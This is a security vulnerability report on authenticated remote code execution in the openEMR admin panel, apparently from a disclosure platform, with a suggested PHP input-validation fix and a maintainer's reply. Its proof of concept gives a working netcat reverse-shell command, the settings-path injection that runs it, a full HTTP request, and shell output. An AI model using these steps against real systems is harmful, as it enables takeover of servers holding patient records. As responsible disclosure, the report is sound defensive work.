Multiple Authenticated Remote Code Execution Vulnerabilities in Admin Panel in openemr/openemr
Reported on
Sep 21st 2022
Description
An attacker with administrative privileges in the openEMR application can execute arbitrary code on the server (remote code execution, RCE). This was tested on openEMR version 7.0.0 (1) but also affects previous versions of openEMR.
Proof of Concept
First of all, start a netcat listener on a server reachable by the openEMR instance:
nc -lkp <port> -v
Upload a "Patient Education PDF" file (Admin->System->Files) named "poc.pdf" with the following content:
nc <server IP> <port> -e /bin/ash
Now, there are two ways to execute the content of poc.pdf (netcat reverse shell).
Way 1
Change the value of "Path to MySQL Binaries" (Admin->Globals->Miscellaneous) to the following value:
/bin/ash /var/www/localhost/htdocs/openemr/sites/default/documents/education/poc.pdf /usr/bin
Create a backup by either clicking "Create Backup" or "Create Eventlog Backup" (Admin->System->Backup).
This executes the content of the "poc.pdf" file with "/bin/ash", which leads to a reverse shell connection to the specified server:
login@pwn:~$ nc -lkp 8888 -v
Listening on 0.0.0.0 8888
Connection received on <redacted> 49623
id
uid=1000(apache) gid=101(apache) groups=82(www-data),101(apache),101(apache)
pwd
/var/www/localhost/htdocs/openemr/interface/main
Way 2
Change the value of "Path to Perl Binaries" (Admin->Globals->Miscellaneous) to the following value:
/bin/ash /var/www/localhost/htdocs/openemr/sites/default/documents/education/poc.pdf /usr/bin
Now, submit the following HTTP Post request with a valid administrator cookie and CSRF token:
POST /interface/main/backup.php HTTP/1.1
Host: openemr
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------248624921937887536913131162645
Content-Length: 610
Origin: https://openemr
Connection: close
Referer: https://openemr/interface/main/backup.php
Cookie: TreeMenuBranchStatus=objTreeMenu_1_node_1_5:objTreeMenu_1_node_1_9; OpenEMR=[ADMIN COOKIE]
-----------------------------248624921937887536913131162645
Content-Disposition: form-data; name="csrf_token_form"
[CSRF TOKEN]
-----------------------------248624921937887536913131162645
Content-Disposition: form-data; name="form_step"
102
-----------------------------248624921937887536913131162645
Content-Disposition: form-data; name="form_cb_lang"
RCE
-----------------------------248624921937887536913131162645
Content-Disposition: form-data; name="form_status"
Executing your reverse shell!
-----------------------------248624921937887536913131162645--
This executes the content of the "poc.pdf" file with "/bin/ash", which leads to a reverse shell connection to the specified server:
login@pwn:~$ nc -lkp 8888 -v
Listening on 0.0.0.0 8888
Connection received on <redacted> 49745
id
uid=1000(apache) gid=101(apache) groups=82(www-data),101(apache),101(apache)
pwd
/var/www/localhost/htdocs/openemr/interface/main
Solution
First off, exposing functionality that lets an admin change the path to the MySQL binaries via the web interface seems fundamentally flawed. Such an operation should only be possible during server setup, not via the web interface.
If this is not possible, it is advised to tighten the input validation of the "Path to MySQL Binaries" value (and likewise "Path to Perl Binaries"): an attacker should not be able to specify arbitrary executables as a path.
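As an added illustration of the second solution (example code, not openEMR's own), one way to validate a binaries-directory setting before backup.php interpolates it into a shell command; the function names and the list of expected binaries are assumptions:

```php
<?php
// Added example, not openEMR code. Validate an admin-supplied "binaries directory"
// setting before it is used the way backup.php uses $GLOBALS['mysql_bin_dir'].
// Function names and the $expected list are assumptions for illustration.

function validate_bin_dir(string $value, array $expected = ['mysqldump', 'mysql']): string
{
    // Accept only a plain absolute path: whitespace, shell metacharacters and
    // parent-directory traversal are all rejected, so the value cannot carry
    // an interpreter plus a script as the report's payload does.
    if (!preg_match('#^/[A-Za-z0-9_./-]*$#', $value) || strpos($value, '..') !== false) {
        throw new InvalidArgumentException('Binary path must be an absolute path without spaces or metacharacters');
    }
    $real = realpath($value);
    if ($real === false || !is_dir($real)) {
        throw new InvalidArgumentException('Binary path is not an existing directory');
    }
    // The directory must actually hold the tools the backup needs; nothing else
    // in it is ever referenced, so an arbitrary executable cannot be substituted.
    foreach ($expected as $bin) {
        $candidate = $real . DIRECTORY_SEPARATOR . $bin;
        if (!is_file($candidate) || !is_executable($candidate)) {
            throw new InvalidArgumentException("Expected executable '$bin' not found in $real");
        }
    }
    return $real;
}

// Build the dump command from the validated directory. Every argument is
// escaped on its own, so none of the values can become extra shell syntax.
function build_dump_command(string $binDir, string $db, string $outFile): string
{
    return escapeshellarg($binDir . '/mysqldump') . ' ' . escapeshellarg($db)
        . ' > ' . escapeshellarg($outFile);
}

// Constructed inputs: a value containing a space must be refused outright,
// while a genuine MySQL directory passes and yields a safely quoted command.
foreach (['/usr/bin /tmp/x', '/usr/bin'] as $setting) {
    try {
        $dir = validate_bin_dir($setting);
        echo "accepted: " . build_dump_command($dir, 'openemr', '/tmp/openemr.sql') . PHP_EOL;
    } catch (InvalidArgumentException $e) {
        echo "rejected '$setting': " . $e->getMessage() . PHP_EOL;
    }
}
```

The second input is accepted only on a host where /usr/bin really contains mysqldump and mysql; elsewhere it is rejected, which is the intended fail-closed behaviour.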
Impact
This vulnerability allows an attacker to execute arbitrary code on the openEMR server.
Occurrences
backup.php L119
The MySQL path ($GLOBALS['mysql_bin_dir']) is used multiple times in the backup.php file.
A preliminary fix has been posted in commit d10b1bf17b6571ac304f2d6a13d0ddeceb81dbed
Please do not create a CVE # or make this vulnerability public at this time. I will make this fix official about 1-2 months after we release 7.0.0 patch 2 (7.0.0.2), which will likely be in about 2-4 weeks. After I do that, then it will be ok to make a CVE # and make it public.
Thanks!